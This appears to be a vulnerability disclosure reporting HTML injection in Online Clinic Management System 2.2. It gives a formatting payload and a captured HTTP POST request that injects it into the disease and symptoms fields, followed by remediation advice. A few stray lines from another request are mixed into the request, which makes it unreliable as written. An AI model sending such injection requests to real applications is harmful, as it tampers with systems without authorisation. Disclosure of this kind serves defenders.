# Exploit Title: Online Clinic Management System 2.2 - HTML Injection
# Date: 2019-11-29
# Exploit Author: Cemal Cihad ÇİFTÇİ
# Vendor Homepage: https://bigprof.com
# Software Download Link : https://bigprof.com/appgini/applications/online-clinic-management-system
# Software : Online Clinic Management System
# Version : 2.2
# Vulnerability Type : HTML Injection
# Vulnerability : HTML Injection

# HTML Injection has been discovered in the Online Clinic Management System created by bigprof/AppGini,
# in the add disease symptom, patient and appointment sections.
# payload: <b><i>asd</i></b>
# Note: the submitted "disease" and "symptoms" values are rendered back as markup instead of text;
# HTML-encoding these fields on output (and validating them on input) closes the injection.

# HTTP POST request
# NOTE(review): the first three lines below (POST /inovicing/app/admin/pageEditGroup.php ...) look like a
# leftover from a different captured request; the request that carries the payload starts at
# POST /clinic/disease_symptoms_view.php. The Cookie header holds session identifiers, so the request
# appears to have been sent from a logged-in session.

POST /inovicing/app/admin/pageEditGroup.php HTTP/1.1
Host: 10.10.10.160
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
POST /clinic/disease_symptoms_view.php HTTP/1.1
Host: 10.10.10.160
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------325041947016922
Content-Length: 1501
Origin: http://10.10.10.160
Connection: close
Referer: http://10.10.10.160/clinic/disease_symptoms_view.php
Cookie: inventory=4eg101l42apiuvutr7vguma5ar; online_inovicing_system=vl8ml5or8sgdee9ep9lnhglk69; online_clinic_management_system=e3fqbalmcu4o9d4tvuuakpn9e8
Upgrade-Insecure-Requests: 1

-----------------------------325041947016922
Content-Disposition: form-data; name="current_view"

DV
-----------------------------325041947016922
Content-Disposition: form-data; name="SortField"

-----------------------------325041947016922
Content-Disposition: form-data; name="SelectedID"

1
-----------------------------325041947016922
Content-Disposition: form-data; name="SelectedField"

-----------------------------325041947016922
Content-Disposition: form-data; name="SortDirection"

-----------------------------325041947016922
Content-Disposition: form-data; name="FirstRecord"

1
-----------------------------325041947016922
Content-Disposition: form-data; name="NoDV"

-----------------------------325041947016922
Content-Disposition: form-data; name="PrintDV"

-----------------------------325041947016922
Content-Disposition: form-data; name="DisplayRecords"

all
-----------------------------325041947016922
Content-Disposition: form-data; name="disease"

<b><i>asd</i></b>
-----------------------------325041947016922
Content-Disposition: form-data; name="symptoms"

<b><i>asd</i></b>
-----------------------------325041947016922
Content-Disposition: form-data; name="reference"

-----------------------------325041947016922
Content-Disposition: form-data; name="update_x"

1
-----------------------------325041947016922
Content-Disposition: form-data; name="SearchString"

-----------------------------325041947016922--